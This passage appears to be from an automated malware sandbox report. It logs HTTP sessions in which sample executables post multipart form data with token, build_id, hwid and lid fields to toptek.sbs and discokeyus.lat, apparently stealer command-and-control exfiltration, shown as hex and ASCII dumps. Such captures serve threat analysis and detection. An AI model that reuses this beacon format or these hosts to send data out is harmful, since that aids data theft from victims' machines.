                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            40192.168.2.44988694.130.188.574432792C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-12-21 21:17:37 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----XBA1N7QQIMO8QQ9H4OZ5
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                            Host: toptek.sbs
                                                                                                                                                                                                                                                            Content-Length: 393697
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            2024-12-21 21:17:37 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 58 42 41 31 4e 37 51 51 49 4d 4f 38 51 51 39 48 34 4f 5a 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 33 64 62 62 38 36 33 66 65 33 63 37 33 62 36 36 32 62 36 31 63 63 65 30 34 38 33 32 65 62 32 0d 0a 2d 2d 2d 2d 2d 2d 58 42 41 31 4e 37 51 51 49 4d 4f 38 51 51 39 48 34 4f 5a 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 33 65 34 32 36 62 33 31 39 65 37 38 66 38 39 65 36 36 64 31 61 63 62 37 36 37 36 64 30 39 33 0d 0a 2d 2d 2d 2d 2d 2d 58 42 41 31 4e 37 51 51 49 4d 4f 38 51 51 39 48 34 4f 5a 35 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                            Data Ascii: ------XBA1N7QQIMO8QQ9H4OZ5Content-Disposition: form-data; name="token"53dbb863fe3c73b662b61cce04832eb2------XBA1N7QQIMO8QQ9H4OZ5Content-Disposition: form-data; name="build_id"d3e426b319e78f89e66d1acb7676d093------XBA1N7QQIMO8QQ9H4OZ5Cont
                                                                                                                                                                                                                                                            2024-12-21 21:17:37 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                            2024-12-21 21:17:37 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                            2024-12-21 21:17:37 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                            2024-12-21 21:17:37 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                            2024-12-21 21:17:37 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                            2024-12-21 21:17:37 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                            2024-12-21 21:17:37 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                            2024-12-21 21:17:37 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                            2024-12-21 21:17:37 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                            2024-12-21 21:17:39 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:17:39 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            41192.168.2.449879104.21.21.99443944C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-12-21 21:17:38 UTC280OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=AP5MU2KQS177B0FAN0
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                            Content-Length: 20437
                                                                                                                                                                                                                                                            Host: discokeyus.lat
                                                                                                                                                                                                                                                            2024-12-21 21:17:38 UTC15331OUTData Raw: 2d 2d 41 50 35 4d 55 32 4b 51 53 31 37 37 42 30 46 41 4e 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 43 42 46 37 41 44 32 31 46 43 39 39 30 44 34 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 41 50 35 4d 55 32 4b 51 53 31 37 37 42 30 46 41 4e 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 41 50 35 4d 55 32 4b 51 53 31 37 37 42 30 46 41 4e 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f
                                                                                                                                                                                                                                                            Data Ascii: --AP5MU2KQS177B0FAN0Content-Disposition: form-data; name="hwid"ACBF7AD21FC990D4AC8923850305D13E--AP5MU2KQS177B0FAN0Content-Disposition: form-data; name="pid"3--AP5MU2KQS177B0FAN0Content-Disposition: form-data; name="lid"PsFKDg--pablo
                                                                                                                                                                                                                                                            2024-12-21 21:17:38 UTC5106OUTData Raw: 00 00 00 00 00 00 00 60 93 1b 88 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00
                                                                                                                                                                                                                                                            Data Ascii: `M?lrQMn 64F6(X&7~`aO
                                                                                                                                                                                                                                                            2024-12-21 21:17:39 UTC1129INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:17:38 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=gvhmug3enpeg3d9oki0brsrsjj; expires=Wed, 16 Apr 2025 15:04:17 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BOZzHKncfuHthz9BB%2FybJEy6gZG7h14Yx4G1RKV1FlqKmqOMGmFTD3IQNt0OW%2Bhrq7LHRH47P3FMmIfItOBoMJHuxyTTeH20pdcUQ92txwpvzIr1gyS954%2B6aQSkb26zeg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 8f5ae66b8f8a7c8d-EWR
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1996&min_rtt=1995&rtt_var=749&sent=12&recv=25&lost=0&retrans=0&sent_bytes=2832&recv_bytes=21397&delivery_rate=1463659&cwnd=185&unsent_bytes=0&cid=57d1c4a5047fa47b&ts=825&x=0"
                                                                                                                                                                                                                                                            2024-12-21 21:17:39 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                            2024-12-21 21:17:39 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            42192.168.2.44988894.130.188.574432792C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-12-21 21:17:39 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----5PZCTRI58YM7QQ1N7GVK
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                            Host: toptek.sbs
                                                                                                                                                                                                                                                            Content-Length: 131557
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            2024-12-21 21:17:39 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 35 50 5a 43 54 52 49 35 38 59 4d 37 51 51 31 4e 37 47 56 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 33 64 62 62 38 36 33 66 65 33 63 37 33 62 36 36 32 62 36 31 63 63 65 30 34 38 33 32 65 62 32 0d 0a 2d 2d 2d 2d 2d 2d 35 50 5a 43 54 52 49 35 38 59 4d 37 51 51 31 4e 37 47 56 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 33 65 34 32 36 62 33 31 39 65 37 38 66 38 39 65 36 36 64 31 61 63 62 37 36 37 36 64 30 39 33 0d 0a 2d 2d 2d 2d 2d 2d 35 50 5a 43 54 52 49 35 38 59 4d 37 51 51 31 4e 37 47 56 4b 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                            Data Ascii: ------5PZCTRI58YM7QQ1N7GVKContent-Disposition: form-data; name="token"53dbb863fe3c73b662b61cce04832eb2------5PZCTRI58YM7QQ1N7GVKContent-Disposition: form-data; name="build_id"d3e426b319e78f89e66d1acb7676d093------5PZCTRI58YM7QQ1N7GVKCont
                                                                                                                                                                                                                                                            2024-12-21 21:17:39 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                            2024-12-21 21:17:39 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
